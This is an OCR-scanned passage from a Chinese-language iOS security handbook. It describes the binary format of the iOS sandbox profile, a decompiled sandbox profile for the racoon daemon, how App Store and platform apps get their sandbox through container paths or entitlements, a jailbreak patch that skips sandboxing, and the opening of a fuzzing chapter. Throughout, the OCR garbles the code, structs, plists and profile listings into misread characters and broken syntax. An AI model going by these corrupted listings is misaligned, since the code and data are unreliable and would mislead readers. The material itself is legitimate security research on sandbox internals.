点 就 会 被 置 为 natch_next 值 ， 表 示 这 是 得 到 确认 的 。 不 然 ， 当 前 节点 会 被 置 为 nomatch_next 
值 。 这 些 节 点 就 构成 了 一 棵 二 叉 决策 树 。 


struct node; 























struct sb profile { 
union { 
struct { 
uint16_t re table offset; 
uint16_t re_table count; 
uint16 t op_table[SsSB_ OP _ TABLE COUNT]; 
} body; 
struct node nodes[1]; 
} uy 





} 


// 该 决策 树 中 有 两 类 不 同 的 节点 。 结 果 节 点 是 终 话 节点 ， 它 会 产生 接受 或 拒绝 操作 的 决定 。 
// 决策 节点 会 对 所 尝试 的 操作 ("Does the path match '/var/awesome'?") 进行 过 滤 ， 
// 并 将 根据 过 滤 操 作 的 结果 过 渡 到 两 个 节点 中 的 某 一 个 


struct result; 
#define NODE_TAG DECISION 0 
#define NODE_TAG_ RESULT 1 














// 每 一 类 过 滤器 都 会 以 不 同方 式 使 用 参数 值 。 

// 例如 ，path 1iteral 参 数 是 过 滤器 的 偏 移 量 ( 离 文 件 的 开头 有 8 个 字 节 块 的 偏 移 ) 。 

// 在 该 偏 移 的 位 置 ， 存 在 一 个 uint32 七 类 型 的 Length 参 数 、 一 个 uint8_t 上 类 型 的 填充 字 节 ， 
// 以 及 一 个 length 字 节 的 ASCII 路 径 。path regex 过 滤器 参数 是 regex 表 的 索引 。 

// 这 些 过 滤器 是 与 谋 入 libsandbox 中 的 Scheme SBPL 脚 本 直接 对 应 的 。 

// 更 多 细节 可 参考 源 代码 包 中 的 sbdis .py 脚本 


struct decision; 

























































































define DECISION_ TYPE_ PATH_ LITERAL 1 
define DECISION_ TYPE_ PATH REGEX 0x81 
define DECISION_ TYPE MOUNT RELATIVE 
define DECISION_ TYPE XATTR i 
define DECISION_ TYPE_ FILE MODE 4 
define DECISION_ TYPE_IPC POSIX - 
define DECISION_ TYPE_ GLOBAL NAME 6 
define DECISION_ TYPE LOCAL 8 
define DECISION_ TYPE REMOTE 9 
define DECISION_ TYPE CONTROL 10 
define DECISION_ TYPE TARGET 14 
define DECISION_TY 二 
define DECISION_TY ENSION 18 
struct node { 

uint8_t tag; 





union { 
struct result terminal; 
struct decision filter; 
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uint8_t raw[7]; 
} u; 


下 


struct result { 
uint8_t padding; 
uint16_t allow or_deny; 


decision { 

8_t type; 

uint16 七 arg; 

uint16_t match next; 
uint16_t nomatch next; 





上 7 

本 书 配 套 的 软件 包 中 含有 从 sandboxd 中 提取 编译 过 的 沙 盒 的 工具 、 提 取 所 有 编译 过 的 正则 
表达 式 的 工具 、 将 regex 二 进 制 大 对 象 反 编译 成 类 似 正 则 表达 式 文法 的 内 容 的 工具 ， 以 及 从 完整 
的 二 进 制 沙 盒 描述 文件 中 提取 可 阅读 描述 文件 的 工具 。 下面 我 们 给 出 了 这 种 工具 所 生成 输出 的 示 
例 ， 该 描述 文件 是 racoon IPSec 守护 进程 的 描述 文件 。 


(['default'], ['deny (with report)']) 
(EE 
'file-chroot', 
'file-issue-extension*', 
'file-issue-extension-read', 
'file-issue-extension-write', 
'file-mknod', 
'file-revoke', 
'file-search'], 














[('allow', 'path == "/private/var/log/racoon.1o0g"'), 
'allow', 'path == "/Library/Keychains/System.keychain"'), 
'allow', 'path == "/private/var/db/mds/system/mdsDirectory.db"'), 
'allow', 'path == "/private/var/db/mds/system/mds.lock"'), 
'allow', 'path == "/private/var/db/mds/system/mdsObject.db"'), 
"allow', path == "/var/log/racoon. log"”}., 
'deny (with report)']) 

(['file-ioctl'], 

[('allow', 'path == "/private/var/run/racoon"'), 

'allow', 'path == 

"/private/var/preferences/SystemConfiguration/com.apple.ipsec.plist"'), 
'allow', 'path == "/private/etc/racoon"'), 
'allow', 'path == "/dev/aes_0"'), 
'allow', 'path == "/dev/dtracehelper"'), 
'allow', 'path == "/dev/shal_0"'), 
'allow', 'path == "/private/etc/master.passwd"'), 
'allow', 'path == "/private/var/log/racoon.1og"'), 
'allow', 'path == "/Library/Keychains/System.keychain"'), 
'allow', 'path == "/private/var/db/mds/system/mdsDirectory.db"'), 
'allow', 'path == "/private/var/db/mds/system/mds.lock"'), 
'allow', 'path == "/private/var/db/mds/system/mdsObject.db"'), 
'allow', 'path == "/var/log/racoon.1og"'), 








'deny (with report)']) 
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(['file-read-xattr', 'file-read*', 'file-read-data'], 
[('allow', 'path == "/private/var/run/racoon"'), 
("allow', "patkh ss 
"/private/var/preferences/SystemConfiguration/com.apple.ipsec.plist"'), 














('allow', 'path == "/private/etc/racoon"'), 
('allow', 'path == "/Library/Managed Preferences"'), 
('allow', 'path == "/private/var/db/mds/messages/se_ SecurityMessages"'), 
('allow', 'path == "/private/var/root"'), 
('allow', 'path == "/Library/Preferences"'), 
(TE; 
'file-mode == 4', 
[('allow', 'path == "/usr/sbin"'), 
(allow',. "Bath se TT/iSE/LIBT), 
('allow', 'path == "/System"'), 
('allow', 'path == "/usr/share"'),]), 
('allow', 'path == , ate vary ob /te on iodine 
('allow', 'path == "/dev/urandom"'), 
('allow', 'path == "/dev/random"'), 
('allow', 'path == "/dev/null"'), 
('allow', 'path == "/dev/zero"'), 
('allow', 'path == "/dev/aes_0"'), 
('allow', 'path == "/dev/dtracehelper"'), 
('allow', 'path == "/dev/shal_0"'), 
('allow', 'path == "/private/etc/master.passwd"'), 
('allow', 'path == "/private/var/log/racoon.log"'), 
('allow', 'path == "/Library/Keychains/System.keychain"'), 
('allow', 'path == "/private/var/db/mds/system/mdsDirectory.db"'), 
('allow', 'path == "/private/var/db/mds/system/mds.lock"'), 
('allow', 'path == "/private/var/db/mds/system/mdsObject.db"'), 
("allow', "path == "/var/log/racoon. log"").; 


'deny (with PD ] 
(['file-read-metadata’], 


[('allow', 'path == "/tmp"'), 
("allow,., path ee Tyrar yy, 
vallowr, hath se "eter)y., 
('allow', 'path == "/private/var/run/racoon"'), 


allow', Bath == 
"/private/var/preferences/SystemConfiguration/com.apple.ipsec.plist"'), 








('allow', 'path == "/private/etc/racoon"'), 
('allow', 'path == "/Library/Managed Preferences"'), 
('allow', 'path == "/private/var/db/mds/messages/se_ SecurityMessages"'), 
('allow', 'path == "/private/var/root"'), 
('allow', 'path == "/Library/Preferences"'), 
(CE 
'file-mode == 4', 
[Callow’,. "path ea /er SDin.T). 
("allow, ath se /iSE/LIBT"), 
('allow', 'path == "/System"'), 
('allow', Dat = /USr/Sharer yy, 1}; 


'allow', 'path Dr rate/ var /dl / tiledner Lotineny, 


( 

('allow', 'path == "/dev/urandom"'), 
('allow', 'path == "/dev/random"'), 
('allow', 'path == "/dev/null"'), 
('allow', 'path == "/dev/zero"'), 
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'allow', 'path == "/dev/aes_0"'), 

'allow', 'path == "/dev/dtracehelper"'), 

'allow', 'path == "/dev/shal_0"'), 

'allow', 'path == "/private/etc/master.passwd"'), 

'allow', 'path == "/private/var/log/racoon.1og"'), 

'allow', 'path == "/Library/Keychains/System.keychain"'), 
'allow', 'path == "/private/var/db/mds/system/mdsDirectory.db"'), 
'allow', 'path == "/private/var/db/mds/system/mds.lock"'), 
'allow', 'path == "/private/var/db/mds/system/mdsObject.db"'), 
"allow', "path = "/var/log/racoon. Log"”}, 


'deny (with report)'])]) 
(['file-write*', 

'file-write-create', 
'file-write-flags', 
'file-write-mode', 
'file-write-mount', 
'file-write-owner', 
'file-write-setugid', 
'file-write-times', 
'file-write-unlink', 
'file-write-unmount', 
'file-write-xattr'], 











[('allow', 'path == "/private/var/run/racoon.pid"'), 
'allow', 'path == "/private/var/run/racoon.sock"'), 
'allow', 'path == "/private/var/log/racoon.1og"'), 
'allow', 'path == "/Library/Keychains/System.keychain"'), 
'allow', 'path == "/private/var/db/mds/system/mdsDirectory.db"'), 
'allow', 'path == "/private/var/db/mds/system/mds.lock"'), 
'allow', 'path == "/private/var/db/mds/system/mdsObject.db"'), 
'allow', 'path == "/var/log/racoon.1og"'), 


'deny (with report)']) 
(['file-write-data'], 





[('allow', 'path == "/dev/zero"'), 
'allow', 'path == "/dev/aes_0"'), 
'allow', 'path == "/dev/dtracehelper"'), 
'allow', 'path == "/dev/shal_0"'), 
'allow', 'path == "/dev/null"'), 
'allow', 'path == "/private/var/run/racoon.pid"'), 
'allow', 'path == "/private/var/run/racoon.sock"'), 
'allow', 'path == "/private/var/log/racoon.1o0g"'), 
'allow', 'path == "/Library/Keychains/System.keychain"'), 
'allow', 'path == "/private/var/db/mds/system/mdsDirectory.db"'), 
'allow', 'path == "/private/var/db/mds/system/mds.lock"'), 
'allow', 'path == "/private/var/db/mds/system/mdsObject.db"'), 





‘llow',. "patlh = */var/ log/racoon. log"”), 
'deny (with report)']) 
'iokit-open'], 


( 





[('allow', 'iokit-user-client-class == "RootDomainUserClient"'), 
'deny (with report)']) 
(['ipc-posix*', 'ipc-posix-sem'], 
[('allow', 'ipc-posix-name == "com.apple.securityd"'), 'deny (with report)']) 
(['ipc-posix-shm'], 
[('allow', 'ipc-posix-name == "com.apple.AppleDatabaseChanged"'), 
'allow', 'ipc-posix-name == "apple.shm.notification center"'), 
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('allow', 'ipc-posix-name == "com.apple.securityd"'), 
'deny (with report)']) 
(Levesctl*"; 


'sysctl-read', 
'sysctl-write', 
'mach-bootstrap', 
'system-socket', 

DEV， 

'priv-adjtime', 
'priv-netinet*', 
'priv-netinet-reservedport'], 


['allow']) 
(['mach-issue-extension', 'mach-lookup'], 
[('allow', 'mach-global-name == "com.apple.ocspd"'), 
('allow', 'mach-global-name == "com.apple.securityd"'), 
('allow', 'mach-global-name == "com.apple.system.notification center"'), 
('allow', 'mach-global-name == "com.apple.system.logger"'), 
("aLLloOw sy 
'mach-global-name == "com.apple.system.DirectoryService.membership_v1l"'), 
('allow', 
‘mach-global-name == "com.apple.system.DirectoryService.l1libinfo vi"'), 
('allow', 'mach-global-name == "com.apple.bsd.dirhelper"'), 
('allow', 'mach-global-name == "com.apple.SecurityServer"'), 
'deny (with report)']) 
(['network*', 'network-inbound', 'network-bind'], 
[l(allow', local. .mateh(udp*:500) 7), 
('allow', 'remote.match (udp:*:*)'), 
('allow', 'path == "/private/var/run/racoon.sock"'), 


('allow', 'local.match (udp:*:4500)'), 
'deny (with report)']) 
(['network-outbound'], 
[('deny (with report)', 
'path.match("^/private/tmp/launchd- ([0-9])+\\.([^/])+/socks$s")'), 


('deny (with report)', 'path == "/private/var/tmp/launchd/sock"'), 
('allow', 'path == "/private/var/run/asl_input"'), 

('allow', 'path == "/private/var/run/syslog"'), 

('allow', 'path == "/private/var/tmp/launchd"'), 

(allow'; "local .mateh(vudBp:*500)")., 

('allow', 'remote.match (udp:*:*)'), 

('allow', 'path == "/private/var/run/racoon.sock"'), 

( 


allow'; local match(udp:* 4500})"); 
'deny (with report)']) 
(['signal'], [('allow', 'target == self'), 'deny (with report)']) 


这 里 唯一 没有 介绍 的 就 是 正则 表达 式 格式 的 细节 。AppleMatch 内 核 扩 展 执行 了 这 一 匹配 并 
规定 了 二 进 制 格式 ， 而 用 户 空间 的 1ipMatch 则 把 正则 表达 式 编译 成 了 舱 入 沙 盒 描述 文件 中 的 
regex 二 进 制 大 对 象 。 编 译 过 的 正则 表达 式 格式 与 www.semantiscope.com/research/BHDC 
2011/BHDC2011-Paper.pdf 中 描述 的 稍 有 不 同 , 但 差异 多 是 表面 上 的 。 就 和 描述 文件 的 字 节 码 格式 
一 样 ， 软 件 包 中 也 包含 了 与 此 有 关 的 最 佳 文档 。 而 redis .py 脚本 则 可 以 把 编译 出 的 regex 二 进 种 
大 对 象 转换 成 等 价 的 正则 表达 式 。 



































Lv 
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5.3.3 ”小 盒 机 制 对 App Store 应 用 和 平台 应 用 的 影响 


在 非常 详细 地 看 过 沙 盒 的 实现 后 , 大 家 应 该 想 知道 这 一 特性 现在 的 使 用 方式 。 所 使 用 描述 文 
件 的 细节 没有 得 到 很 好 的 记录 说 明 , 但 大 家 都 知道 沙 盒 限制 了 那些 从 App Store 上 下 载 的 应 用 。 除 
此 之 外 , 像 MobileSafari 和 MobileMail 这 样 的 平台 应 用 有 很 多 也 被 置 于 沙 盒 之 中 。 这 些 应 用 是 如 何 
在 沙 盒 下 运行 的 ? 各 个 App Store 应 用 是 如 何 被 限制 在 它们 各 自 的 容器 目录 中 的 ?” 这 些 就 是 本 节 
要 回答 的 问题 。 

出 人 意料 的 是 , App Store 应 用 和 平台 应 用 都 不 会 直接 调用 sandbox_init 或 相关 函数 。 此 外 ， 
虽然 可 以 通过 launchd 和 沙 盒 描述 文件 来 运行 应 用 ， 但 我 们 发 现 没有 哪个 内 置 应 用 使 用 该 功能 。 
好 在 内 核 扩 展 中 的 某 些 字符 串 指明 了 通 向 答案 的 路 : 


__ cstring:805FDA21 aPrivateVarMobi DCB "/private/var/mobile/Applications/",0 






































__ cstring:805FDB6F aSandboxIgnorin DCB "Sandbox: ignoring builtin profile for 
platform app: %s",0OxA,0 


对 这 些 字符 串 的 如 下 交叉 引用 说 明 它 们 都 是 用 于 函数 sbx_creq_label_update_execve 
的 。 只 要 加 载 新 的 可 执行 镜像 ， 该 函数 就 要 被 调用 。 记 住 ， 不 管 当 前 进程 是 否 已 经 初始 化 沙 盒 ， 
TrustedBSD 气 数 都 会 被 调用 。 如 果 沙 盒 尚 未 初始 化 ,大 多 数 函 数 都 会 在 不 进行 检查 的 情况 下 早早 
返回 。 在 这 种 情况 下 ，sbx_cred_label_update_execve 首 先 会 为 已 加 载 的 可 执行 镜像 计算 路 
径 。 如 果 可 执行 镜像 在 /private/varmobile/Applications 之 下 , 那么 内 置 的 沙 盒 描述 文件 ( 也 就 是 “ 容 
如 ”) 会 被 加 载 ， 而 且 处 于 上 述 目 录 下 的 路 径 会 被 作为 扩展 添加 。 该 扩展 可 以 启用 用 于 所 有 App 
Store 应 用 的 同一 容器 描述 文件 (不管 这 些 应 用 是 否 处 在 不 同 子 目录 中 )。 这 与 本 章 第 一 节 中 给 出 
的 例子 相 呼 应 。 

像 MobileSafari 这 样 的 平台 应 用 并 未 被 置 于 App Store 的 目录 结构 下 。 对 于 这 些 应 用 来 说 ， 沙 
盒 描述 文件 可 以 在 Mach-O 可 执行 文件 代码 签名 加 载 命令 的 内 骸 授 权 (embedded entitlement ) 部 
分 中 指定 。 下 面 的 内 容 是 MobileSafari 内 能 授权 的 摘录 : 


pitfall:entitlements dions ./grab entitlements.py MobileSafari 
<?xml] version="1.0" encoding="UTF-8"?> 

<!IDOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 

<plist version="1.0"> 

<diet> 



































<key>com.apple.coreaudio.allow-amr-decode</key> 

true/> 
key>com.apple.coremedia.allow-protected-content-playback</key> 
true/> 
key>com.apple.managedconfiguration.profiled-access</key> 
true/> 

key>com.apple.springboard.opensensitiveurl</key> 

true/> 

key>dynamic-codesigning</key> 

true/> 


人 信人 A 信人 人 A 信人 人 A 
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<key>keychain-access-groups</key> 
<array> 
<string>com.apple.cfnetwork</string> 
<string>com.apple.identities</string> 
<string>com.apple.mobilesafari</string> 
<string>com.apple.certificates</string> 
</array> 
<key>platform-application</key> 
<true/> 
<key>seatbelt-profiles</key> 
<array> 
<string>MobileSafari</string> 
</array> 
<key>vm-pressure-level</key> 
<true/> 
</dict> 
</plist> 


在 本 书 配 套 网 站 提供 的 脚本 包 中 ，grab_entitlements.py 可 以 从 二 进 制 文件 中 提取 出 内 
山 授 权 。 通 过 在 平台 应 用 的 内 骸 授 权 中 查找 seatbelt-profiles 键 ,大 家 可 以 确认 内 核 应 用 了 
哪个 沙 盒 描述 文件 ( 当前 尚 不 支持 同时 使 用 两 个 或 更 多 描述 文件 )。 这 与 App Store 应 用 使 用 了 相 
同 的 描述 文件 初始 化 函数 。 我 们 会 调用 AppleMobileFileIntegrity 扩 展 加 载 内 构 的 描述 文件 
名 称 。 该 名 称 会 用 来 初始 化 沙 盒 描述 文件 ， 就 像 之 前 用 过 的 容 需 那样 。 

为 了 展示 它们 的 用 途 , 本 例会 试 着 创建 一 个 以 各 种 可 能 的 方式 初始 化 其 沙 盒 的 应 用 。 我 们 会 
在 /mp 目录 下 放置 一 个 不 带 内 骨 授 权 的 可 执行 文件 ,在 App Store 目 录 下 放置 一 个 可 执行 文件 ,还 
有 一 个 可 执行 文件 将 具有 指定 了 某 个 内 置 描述 文件 的 内 骨 授 权 。 

为 了 试验 各 种 途径 ,我 们 要 创建 一 个 测试 用 的 可 执行 文件 ， 用 它 尝 试 读 取 /private/var/tmp 目 
录 下 的 某 个 文件 。 这 一 途径 受到 App Store 容 器 描述 文件 的 限制 。 源 代码 如 下 所 示 : 


#include <stdio.h> 
#include <string.h> 














int main(int argc, char *argv[]) { 
FILE *f = fopen("/private/var/tmp/can you see me", '"r"); 
(NULE)Y》 区 


char buff[80]; 
memset (buff, 0, 80); 
fgets(buff, 80, f); 
Drintf("%e™, Buff} 
fclose(f); 
} else { 
perror ("fopen failed"); 
} 
return 0; 


} 
第 一 个 测试 是 验证 沙 盒 之 外 的 操作 。 大 家 可 以 从 /tmp 执 行 这 一 测试 。 下 面 的 内 容 展 示 了 预期 
的 输出 : 


iFauxn:~ root# /tmp/sb5 
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This is /tmp/can you_see_me 

不 出 所 料 ， 未 受 沙 盒 限 制 的 应 用 可 以 读 取 该 文件 。 要 测试 通过 sbx_creq_label_update_ 
execve 的 第 二 条 途径 ， 大 家 可 以 把 之 前 执行 过 的 二 进 制 文件 复制 到 /private/var/mobile/ 
Applications 下 的 子 目 录 ( 比如 /private/var/mobile/Applications/DDDDDDDD-DDDD-DDDD- 
DDDD-DDDDDDDDDDDD/ ) 中 。 通过 在 该 目录 下 执行 这 个 测试 文件 , 沙 盒 内 核 扩展 会 自动 把 进 
阳 的 描述 文件 设置 为 容器 的 内 置 描述 文件 。 下 面 的 代码 展示 了 这 一 点 ,并且 会 利用 amesg 进 一 步 
验证 容 需 描述 文件 。 

iFauxn:~ root# cp ~/ioshh/sb5 /private/var/mobile/Applications 

/DDDDDDDD-DDDD-DDDD-DDDD-DDDDDDDDDDDD/ 

iFauxn:~ root# /private/var/mobile/Applications/DDDDDDDD-DDDD-DDDD-DDDD-DDDDDDDDDDDD/ 

sb5 


fopen failed: Operation not permitted 
iFauxn:~ root# dmesg | tail 


3 





bash[15427] Builtin profile: container (sandbox) 
bash[15427] Container: /private/var/mobile/Applications/DDDDDDDD-DDDD-DDDD-DDDD- 
DDDDDDDDD[69] (sandbox) 


dmesg 的 输出 也 证 实 了 沙 盒 扩展 的 使 用 〈 在 由 App Store 逻 辑 使 用 时 ， 称 为 Container )。 最 后 
我 们 要 尝试 的 是 使 用 了 内 衣 授 权 的 平台 应 用 摘 述 文件 (MobileSafari 方 法 )。 为 了 做 到 这 些 ， 大 家 
需要 在 代码 签名 阶段 杏 入 授权 属性 列表 : 


pitfall:sb5 dions$ cat sb5.entitlements 

<?xml] version="1.0" encoding="UTF-8"?> 

<!IDOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 

<diet> 























<key>seatbelt-profiles</key> 
<array> 
<string>container</string> 
</array> 
/Adiet 
</plist> 


pitfall:sb5 dion$ make sb5-ee 
/Developer/Platforms/iPhoneOSs.platform/Developer/usr/bin/gcc -arch armv6 
-isysroot 
/Developer/Platforms/iPhoneOSsS.platform/Developer/SDKs/iPhoneOs5.0.sdk sb5.c 
-O sb5-ee 

export 

CODESIGN_ALLOCATE= 
/Developer/Platforms/iPhoneOSs.platform/Developer/usr/bin/codesign 
allocate 

codesign -fs "dion" --entitlements sb5.entitlements sb5-ee 

pitfall:sb5 Qions 


代码 签名 工具 会 为 二 进 制 文件 签名 ， 并 将 该 签名 置 于 LC_CoDpE_STGNATURE Mach-0 load 
命令 中 。LC_cCODE_SIGNATURE 块 中 数据 的 格式 是 在 xnu-1699.24.8/bsd/kern/ubc_subr.c 中 描述 的 。 
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如 前 所 述 ， 骨 入 的 plist 被 放 在 这 个 块 中 ， 通 过 沙 盒 内 核 扩展 查询 。 该 二 进 制 文件 一 旦 执行 ， 内 核 
就 应 该 把 描述 文件 初始 化 到 container 中 (本 例 中 不 会 设置 扩展 )。 该 文件 不 应 该 是 可 读 的 。 不 
巧 的 是 ， 至 少 在 打 过 redsnow 0.9.9b7 补 丁 的 使 用 iOS 5.0 的 iPhone 4 上 ， 这 个 例子 会 失败 : 


iFauxn:~ root# cp ~/ioshh/sb5-ee /tmp 

iFauxn:~ root# /tmp/sb5-ee 

This is /tmp/can you see me 

iFauxn:~ root# dmesg | grep Sandbox 

Sandbox: ignoring builtin profile for platform app: 
/private/var/stash/Applications.DlYevH/MobileMail.app/MobileMail 

Sandbox: ignoring builtin profile for platform app: 
/private/var/stash/Applications.DlYevH/MobileSafari.app/MobileSafari 
Sandbox: ignoring builtin profile for platform app: /private/var/tmp/sb5-ee 
iFauxn:~ root# 


在 amesg 的 输出 中 ,大 家 会 看 到 所 有 的 平台 应 用 都 是 运行 在 沙 盒 之 外 的 越狱 版 本 中 。 尽 管 这 
样 , 我们 已 经 说 明了 正确 的 途径 ， 也 已 经 用 到 了 内 藤 授 权 。 在 继续 阅读 之 前 ， 大 家 可 以 搞 清 楚 当 
前 的 越狱 补丁 是 怎样 破坏 平台 应 用 的 沙 盒 的 。 大 家 很 容易 在 内 核 缓存 中 找到 “Sandbox: ignoring 
builtin profile..….”( 沙 盒 : 忽略 内 置 描述 文件 …… ) 字符 串 ， 而 它 会 把 大 家 带 向 其 中 一 个 补丁 。 图 
5-3 展 示 了 某 一 个 打 过 补丁 的 基本 块 在 应 用 越狱 补丁 之 前 〈 左 图 ) 和 之 后 ( 右 图 ) 的 样子 。 


















































图 5-3 redsnOw 0.9.9b7 cred label update execve 
这 一 对 比 展现 了 打 过 补丁 的 字 节 一 一 01 23 01 23， 这 些 字 节 可 用 来 强制 进行 调试 模式 的 
sysct1 检 查 , 并 确保 条 件 永远 变 成 为 那些 不 在 App Store 目 录 下 的 应 用 忽略 沙 盒 描述 文件 的 情况 。 
在 用 越狱 过 的 让 hone 研 究 漏 洞 攻击 或 有 效 载荷 时 ， 大 家 应 该 将 这 类 异 浓 牢记 于 心 。 
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5.4 小 结 


iOS 沙 盒 的 设计 初衷 是 要 限制 代码 执行 后 的 漏洞 攻击 ， 并 根据 进程 进行 一 般 操作 所 需 权 限 对 
进程 施加 限制 ， 从 而 拒 恶意 软件 于 App Store 之 外 。App Store 应 用 都 是 利用 这 一 特性 进行 隔离 的 ， 
而 40 余 种 预 装 的 平台 应 用 ( 例如 MobileSafari 和 MobileMail ) 则 具有 自 定义 的 描述 文件 来 限制 可 对 
它们 进行 的 操作 。 沙 盒 系 统 的 主要 组 件 是 通过 公开 TrustedBSD 策 略 的 内 核 扩展 实现 的 。 内 核 扩展 
会 将 进程 置 于 由 领域 特定 语言 编写 的 Scheme 脚 本 所 描述 的 沙 盒 中 ,该 描述 文件 会 被 提炼 成 根据 操 
作 的 属性 〈 例 如 vnode 的 路 径 或 端口 号 ) 过 滤 操 作 ， 或 是 在 允许 或 拒绝 的 决定 中 终结 的 决策 树 。 
描述 文件 可 能 在 运行 时 以 受 限 的 方式 得 到 扩展 。 

至 此 ， 大 家 应 该 能 编写 针对 mac_syscall ("sandbox"，,.. .) 子 系统 调用 的 系统 调用 fuzzer 
工具 了 。 内 核 为 沙 盒 扩展 提供 的 和 人口 点 是 作为 人 工 审计 的 起 始点 给 出 的 。 对 想 绕 过 沙 盒 的 攻击 者 
来 说 ,本 章 讨论 了 二 进 制 描述 文件 的 格式 和 评估 ， 以 及 销毁 二 进 制 描述 文件 的 代码 。 另 外 , 我们 
还 讨论 了 如 何 将 该 评估 函数 作为 参照 点 把 内 核 操 作 映 射 到 SBPL 操 作 。 这 是 攻击 者 感 兴趣 的 另 一 


条 绕 过 沙 盒 的 途径 。 
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对 iOS 应 用 进行 模糊 ;测试 








对 设备 进行 远程 漏洞 攻击 的 第 一 步 是 要 找到 其 中 的 安全 漏洞 。 正 如 我 们 在 第 1 章 中 讨论 iOS 
受 攻击 面 时 所 提 到 的 ， 攻 击 者 可 能 有 多 种 方式 为 OS 设备 供应 数据 。 这 中 间 包 括 某 些 服务 右 端 的 
威胁 ， 比 如 mDNSresponder、 无 线 和 蓝牙 栈 ， 而 且 从 某 种 程度 上 讲 还 包括 短信 。 而 客户 端 也 有 诸 
多 这 样 的 程序 ,包括 Web 浏 览 器 、 邮 件 客户 端 、 音 频 / 视 频 播放 器 ， 以 及 App Store 应 用 。 关 键 在 于 
我 们 要 为 某 个 程序 找 一 个 特殊 的 输入 ， 然 后 用 该 输入 改变 该 程序 的 行为 。 

这 样 一 来 就 需要 模糊 测试 (fuzzing ) 出 马 了 。 模 糊 测 试 是 指 通过 反复 向 待 测 应 用 发 送 畸 形 的 
数据 ， 对 应 用 进行 动态 测试 的 过 程 。 最 为 重要 的 是 ， 模 糊 测试 让 你 可 以 在 iOS 中 发 现 许 多 漏洞 ， 
而 有 时 你 几乎 不 用 费 什么 劲 , 有 时 甚至 不 必 对 待 测 的 底层 程序 有 多 少 了 解 。 换 名 话说, 这 是 为 iOS 
找 bug 的 最 简 方 法 。 

在 后 面 的 章节 中 , 大 家 会 了 解 到 如 何 利 用 这 些 漏洞 进行 漏洞 攻击 ,从 而 在 受 影响 的 设备 上 执 
行 某 些 未 经 授权 的 行动 。 























6.1 模糊 测试 的 原理 


模糊 测试 ， 也 称 动态 分 析 ， 是 一 种 构造 非法 输入 并 将 其 提供 给 应 用 ,以 期 让 应 用 暴露 出 某 些 
安全 问题 的 艺术 和 科学 。 市面 上 有 很 多 专门 介绍 这 一 主题 的 图 书 , 包括 由 Sutton、Greene 和 Amini 
所 蔷 的 Fuzzing: Brute Force Discovery ( 978-0321446114 )， 以 及 Takanen 、DeMott 和 Miller 所 车 的 
Fuzzing for Sofiware Security Testing and Ouality Assurance ( 978-1596932142 )。 模 糊 测试 也 许 是 最 
简单 的 bug 查 找 方法 。 人 们 之 前 已 经 用 它 在 各 种 各 样 的 产品 中 找到 了 无 数 与 安全 相关 的 bug, 这 些 
产品 包括 Apache HTTP Server、Microsoft RPC 接 口 ， 当 然 也 包括 iDOS 上 的 MobileSafari。 

模糊 测试 的 基本 理念 就 是 重复 向 系统 发 送 轻 度 畸形 的 输入 。 设 计 和 实现 得 很 好 的 应 用 应 该 能 
处 理 提 供给 它 的 任何 输入 , 并 应 该 拒绝 无 效 的 输入 , 继续 等 待 后 续 数 据 。 当 它 接 收 到 有 效 输入 时 ， 
应 用 应 该 按照 设计 预期 执行 操作 。 无 论 哪 种 情况 ,程序 都 不 应 该 崩 演 或 停止 正常 工作 。 模 糊 测试 
就 是 通过 向 程序 发 送 数 以 百 万 计 的 输入 ， 查 看 程序 是 否 会 月 省 〈 或 执行 某 些 其 他 未 经 许可 的 行 
为 )， 以 此 来 测试 程序 是 否 满足 这 一 要 求 。 测 试 人 员 在 模糊 测试 期 间 会 对 应 用 进行 监控 ,确定 哪 
些 输入 会 让 应 用 出 错 。 
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我 们 能 够 利用 模糊 测试 找到 的 bug 通 常 包括 缓冲 区 溢出 这 样 的 内 存 损 坏 型 漏洞 。 例 如 ， 程 序 
员 假 定 某 种 特殊 数据 ( 比方 说 电话 号 码 ) 不 会 超过 32 字 节 , 并 因此 为 该 数据 准备 了 大 小 为 32 字 闻 
的 缓冲 区 。 如 果 开 发 人 员 没有 显 式 地 检查 该 数据 ( 或 是 限制 进入 该 缓冲 区 的 副本 的 大 小 )， 就 可 
能 因为 预 设 缓冲 区 之 外 的 数据 损坏 而 遇 到 问题 。 出 于 这 种 原因 , 模糊 测试 通常 被 当做 一 种 通过 提 
交 畸 形 数据 对 开发 人 员 的 假定 进行 测试 的 技巧 。 

大 家 很 快 就 会 看 到 模糊 测试 的 一 个 不 凡 之 处 , 那 就 是 很 容易 搭建 基本 的 模糊 测试 环境 并 用 它 
找到 真正 的 bug。 我 们 并 不 需要 了 解 欲 测试 的 程序 ( 或 拿 到 待 测 程序 的 源 代 码 )， 也 不 需要 了 解 进 
行 模糊 测试 所 用 的 输入 。 在 最 简单 的 情况 下 ,我 们 所 需要 的 就 只 有 一 个 程序 和 它 的 有 效 输入 。 有 
了 这 些 ， 再 加 上 一 点 时 间 和 CPU 周期 ， 我 们 就 能 让 模糊 测试 运行 起 来 了 。 不 过 大 家 随后 会 看 到 ， 
虽然 可 以 很 快 地 设置 模糊 测试 ， 但 是 要 对 程序 进行 深度 的 模糊 测试 并 找 出 最 重大 的 bug， 还 是 要 
对 能 造成 影响 的 输入 以 及 底层 程序 的 作用 机 制 有 所 了 解 。 话 说 回来 , 苹果 这 样 的 公司 以 及 其 他 组 
织 机 构 的 研究 人 员 都 会 进行 模糊 测试 ， 所 以 要 找到 最 重大 的 bug， 有 时 候 需 要 进行 更 深层 次 的 模 
糊 测 试 。 

模糊 测试 也 并 非 尽 善 尽 美 ， 有 些 bug 是 模糊 测试 没 法 发 现 的 。 比 方 说 , 某 个 字段 具有 校 验 和 ， 
当 输 入 被 修改 后 ,就 会 让 程序 拒绝 该 输入 。 输入 中 的 多 个 字 节 可 能 是 相互 关联 的 ,而 其 中 一 个 的 
改变 是 很 容易 被 检测 出 的 ,这 就 会 让 程序 很 快 拒绝 无 效 输 入 。 同 样 ， 如果 只 有 在 满足 非常 精确 的 
条 件 时 bug 才 很 明显 , 那么 模糊 测试 可 能 找 不 出 这 个 bug, 至 少 在 合理 的 时 间 内 是 找 不 出 的 。 所 以 ， 
不 仅 是 某 些 类 型 的 协议 和 输入 要 比 其 他 的 更 难 进行 模糊 测试 , 而 且 不 同类 型 的 应 用 也 会 更 难 进 行 
